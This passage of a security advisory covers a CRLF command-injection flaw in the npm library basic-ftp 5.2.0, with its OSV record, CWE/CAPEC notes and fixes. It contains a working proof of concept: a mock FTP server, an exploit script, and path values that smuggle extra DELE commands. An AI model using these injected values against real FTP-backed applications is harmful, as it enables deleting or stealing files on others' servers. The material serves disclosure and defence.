node ftp-server-mock.js

# Terminal 2: Run exploit
node poc.js

Expected output on mock server:

"OPTS UTF8 ON"
"USER anonymous"
"PASS anonymous"
"FEAT"
"TYPE I"
"STRU F"
"OPTS UTF8 ON"
"CWD harmless.txt"
"DELE /important-file.txt"   <-- injected from cd()
"DELE decoy.txt"
"DELE /secret-data.txt"      <-- injected from remove()
"QUIT"

This command trace was reproduced against the published basic-ftp@5.2.0 package on Linux with a local mock FTP server. The injected DELE commands are received as distinct FTP commands, confirming that CRLF inside path parameters is not neutralized before socket write.

Mitigation

Immediate workaround: Sanitize all path inputs before passing them to basic-ftp:

function sanitizeFtpPath(path) {
  if (/[\r\n]/.test(path)) {
    throw new Error('Invalid FTP path: contains control characters');
  }
  return path;
}

// Usage
await client.cd(sanitizeFtpPath(userInput));

Recommended fix for basic-ftp: The protectWhitespace() function (or a new validation layer) should reject or strip \r and \n characters from all path inputs:

async protectWhitespace(path) {
    // Reject CRLF injection attempts
    if (/[\r\n\0]/.test(path)) {
        throw new Error('Invalid path: contains control characters');
    }
    if (!path.startsWith(" ")) {
        return path;
    }
    const pwd = await this.pwd();
    const absolutePathPrefix = pwd.endsWith("/") ? pwd : pwd + "/";
    return absolutePathPrefix + path;
}

References

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "basic-ftp"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.2.0"
            },
            {
              "fixed": "5.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "5.2.0"
      ]
    }
  ],
  "aliases": [
    "CVE-2026-39983"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-93"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-08T20:02:25Z",
    "nvd_published_at": "2026-04-09T18:17:02Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\n`basic-ftp` version `5.2.0` allows FTP command injection via CRLF sequences (`\\r\\n`) in file path parameters passed to high-level path APIs such as `cd()`, `remove()`, `rename()`, `uploadFrom()`, `downloadTo()`, `list()`, and `removeDir()`. The library\u0027s `protectWhitespace()` helper only handles leading spaces and returns other paths unchanged, while `FtpContext.send()` writes the resulting command string directly to the control socket with `\\r\\n` appended. This lets attacker-controlled path strings split one intended FTP command into multiple commands.\n\n## Affected product\n\n| Product | Affected versions | Fixed version |\n| --- | --- | --- |\n| basic-ftp (npm) | 5.2.0 (confirmed) | no fix available as of 2026-04-04 |\n\n## Vulnerability details\n\n- CWE: `CWE-93` - Improper Neutralization of CRLF Sequences (\u0027CRLF Injection\u0027)\n- CVSS 3.1: `8.6` (`High`)\n- Vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L`\n- Affected component: `dist/Client.js`, all path-handling methods via `protectWhitespace()` and `send()`\n\nThe vulnerability exists because of two interacting code patterns:\n\n**1. Inadequate path sanitization in `protectWhitespace()` (line 677):**\n\n```javascript\nasync protectWhitespace(path) {\n    if (!path.startsWith(\" \")) {\n        return path;  // No sanitization of \\r\\n characters\n    }\n    const pwd = await this.pwd();\n    const absolutePathPrefix = pwd.endsWith(\"/\") ? pwd : pwd + \"/\";\n    return absolutePathPrefix + path;\n}\n```\n\nThis function only handles leading whitespace. It does not strip or reject `\\r` (0x0D) or `\\n` (0x0A) characters anywhere in the path string.\n\n**2. Direct socket write in `send()` (FtpContext.js line 177):**\n\n```javascript\nsend(command) {\n    this._socket.write(command + \"\\r\\n\", this.encoding);\n}\n```\n\nThe `send()` method appends `\\r\\n` to the command and writes directly to the TCP socket. If the command string already contains `\\r\\n` sequences (from unsanitized path input), the FTP server interprets them as command delimiters, causing the single intended command to be split into multiple commands.\n\n**Affected methods** (all call `protectWhitespace()` \u2192 `send()`):\n- `cd(path)` \u2192 `CWD ${path}`\n- `remove(path)` \u2192 `DELE ${path}`\n- `list(path)` \u2192 `LIST ${path}`\n- `downloadTo(localPath, remotePath)` \u2192 `RETR ${remotePath}`\n- `uploadFrom(localPath, remotePath)` \u2192 `STOR ${remotePath}`\n- `rename(srcPath, destPath)` \u2192 `RNFR ${srcPath}` / `RNTO ${destPath}`\n- `removeDir(path)` \u2192 `RMD ${path}`\n\n## Technical impact\n\nAn attacker who controls file path parameters can inject arbitrary FTP protocol commands, enabling:\n\n1. **Arbitrary file deletion**: Inject `DELE /critical-file` to delete files on the FTP server\n2. **Directory manipulation**: Inject `MKD` or `RMD` commands to create/remove directories\n3. **File exfiltration**: Inject `RETR` commands to trigger downloads of unintended files\n4. **Server command execution**: On FTP servers supporting `SITE EXEC`, inject system commands\n5. **Session hijacking**: Inject `USER`/`PASS` commands to re-authenticate as a different user\n6. **Service disruption**: Inject `QUIT` to terminate the FTP session unexpectedly\n\nThe attack is realistic in applications that accept user input for FTP file paths \u2014 for example, web applications that allow users to specify files to download from or upload to an FTP server.\n\n## Proof of concept\n\n**Prerequisites:**\n\n```bash\nmkdir basic-ftp-poc \u0026\u0026 cd basic-ftp-poc\nnpm init -y\nnpm install basic-ftp@5.2.0\n```\n\n**Mock FTP server (ftp-server-mock.js):**\n\n```javascript\nconst net = require(\u0027net\u0027);\nconst server = net.createServer(conn =\u003e {\n  console.log(\u0027[+] Client connected\u0027);\n  conn.write(\u0027220 Mock FTP\\r\\n\u0027);\n  let buffer = \u0027\u0027;\n  conn.on(\u0027data\u0027, data =\u003e {\n    buffer += data.toString();\n    const lines = buffer.split(\u0027\\r\\n\u0027);\n    buffer = lines.pop();\n    for (const line of lines) {\n      if (!line) continue;\n      console.log(\u0027[CMD] \u0027 + JSON.stringify(line));\n      if (line.startsWith(\u0027USER\u0027)) conn.write(\u0027331 OK\\r\\n\u0027);\n      else if (line.startsWith(\u0027PASS\u0027)) conn.write(\u0027230 Logged in\\r\\n\u0027);\n      else if (line.startsWith(\u0027FEAT\u0027)) conn.write(\u0027211 End\\r\\n\u0027);\n      else if (line.startsWith(\u0027TYPE\u0027)) conn.write(\u0027200 OK\\r\\n\u0027);\n      else if (line.startsWith(\u0027PWD\u0027))  conn.write(\u0027257 \"/\"\\r\\n\u0027);\n      else if (line.startsWith(\u0027OPTS\u0027)) conn.write(\u0027200 OK\\r\\n\u0027);\n      else if (line.startsWith(\u0027STRU\u0027)) conn.write(\u0027200 OK\\r\\n\u0027);\n      else if (line.startsWith(\u0027CWD\u0027))  conn.write(\u0027250 OK\\r\\n\u0027);\n      else if (line.startsWith(\u0027DELE\u0027)) conn.write(\u0027250 Deleted\\r\\n\u0027);\n      else if (line.startsWith(\u0027QUIT\u0027)) { conn.write(\u0027221 Bye\\r\\n\u0027); conn.end(); }\n      else conn.write(\u0027200 OK\\r\\n\u0027);\n    }\n  });\n});\nserver.listen(2121, () =\u003e console.log(\u0027[*] Mock FTP on port 2121\u0027));\n```\n\n**Exploit (poc.js):**\n\n```javascript\nconst ftp = require(\u0027basic-ftp\u0027);\n\nasync function exploit() {\n  const client = new ftp.Client();\n  client.ftp.verbose = true;\n  try {\n    await client.access({\n      host: \u0027127.0.0.1\u0027,\n      port: 2121,\n      user: \u0027anonymous\u0027,\n      password: \u0027anonymous\u0027\n    });\n\n    // Attack 1: Inject DELE command via cd()\n    // Intended: CWD harmless.txt\n    // Actual:   CWD harmless.txt\\r\\nDELE /important-file.txt\n    const maliciousPath = \"harmless.txt\\r\\nDELE /important-file.txt\";\n    console.log(\u0027\\n=== Attack 1: DELE injection via cd() ===\u0027);\n    try { await client.cd(maliciousPath); } catch(e) {}\n\n    // Attack 2: Double DELE via remove()\n    const maliciousPath2 = \"decoy.txt\\r\\nDELE /secret-data.txt\";\n    console.log(\u0027\\n=== Attack 2: DELE injection via remove() ===\u0027);\n    try { await client.remove(maliciousPath2); } catch(e) {}\n\n  } finally {\n    client.close();\n  }\n}\nexploit();\n```\n\n**Running the PoC:**\n\n```bash\n# Terminal 1: Start mock FTP server\nnode ftp-server-mock.js\n\n# Terminal 2: Run exploit\nnode poc.js\n```\n\n**Expected output on mock server:**\n\n```\n\"OPTS UTF8 ON\"\n\"USER anonymous\"\n\"PASS anonymous\"\n\"FEAT\"\n\"TYPE I\"\n\"STRU F\"\n\"OPTS UTF8 ON\"\n\"CWD harmless.txt\"\n\"DELE /important-file.txt\"   \u003c-- injected from cd()\n\"DELE decoy.txt\"\n\"DELE /secret-data.txt\"      \u003c-- injected from remove()\n\"QUIT\"\n```\n\nThis command trace was reproduced against the published `basic-ftp@5.2.0`\npackage on Linux with a local mock FTP server. The injected `DELE` commands are\nreceived as distinct FTP commands, confirming that CRLF inside path parameters\nis not neutralized before socket write.\n\n## Mitigation\n\n**Immediate workaround**: Sanitize all path inputs before passing them to basic-ftp:\n\n```javascript\nfunction sanitizeFtpPath(path) {\n  if (/[\\r\\n]/.test(path)) {\n    throw new Error(\u0027Invalid FTP path: contains control characters\u0027);\n  }\n  return path;\n}\n\n// Usage\nawait client.cd(sanitizeFtpPath(userInput));\n```\n\n**Recommended fix for basic-ftp**: The `protectWhitespace()` function (or a new validation layer) should reject or strip `\\r` and `\\n` characters from all path inputs:\n\n```javascript\nasync protectWhitespace(path) {\n    // Reject CRLF injection attempts\n    if (/[\\r\\n\\0]/.test(path)) {\n        throw new Error(\u0027Invalid path: contains control characters\u0027);\n    }\n    if (!path.startsWith(\" \")) {\n        return path;\n    }\n    const pwd = await this.pwd();\n    const absolutePathPrefix = pwd.endsWith(\"/\") ? pwd : pwd + \"/\";\n    return absolutePathPrefix + path;\n}\n```\n\n## References\n\n- [npm package: basic-ftp](https://www.npmjs.com/package/basic-ftp)\n- [GitHub repository](https://github.com/patrickjuchli/basic-ftp)\n- [Vulnerable source: Client.js protectWhitespace()](https://github.com/patrickjuchli/basic-ftp/blob/master/src/Client.ts)\n- [Vulnerable source: FtpContext.js send()](https://github.com/patrickjuchli/basic-ftp/blob/master/src/FtpContext.ts)\n- [CWE-93: Improper Neutralization of CRLF Sequences](https://cwe.mitre.org/data/definitions/93.html)\n- [OWASP: CRLF Injection](https://owasp.org/www-community/vulnerabilities/CRLF_Injection)",
  "id": "GHSA-chqc-8p9q-pq6q",
  "modified": "2026-04-09T19:06:10Z",
  "published": "2026-04-08T20:02:25Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-chqc-8p9q-pq6q"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39983"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patrickjuchli/basic-ftp/commit/2ecc8e2c500c5234115f06fd1dbde1aa03d70f4b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/patrickjuchli/basic-ftp"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patrickjuchli/basic-ftp/releases/tag/v5.2.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "basic-ftp has FTP Command Injection via CRLF"
}

Mitigation
Implementation

Avoid using CRLF as a special sequence.

Mitigation
Implementation

Appropriately filter or quote CRLF sequences in user-controlled input.

CAPEC-15: Command Delimiters

An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or denylist input validation, as opposed to allowlist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or denylist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.

CAPEC-81: Web Server Logs Tampering

Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to "Log Injection-Tampering-Forging" except that in this case, the attack is targeting the logs of the web server and not the application.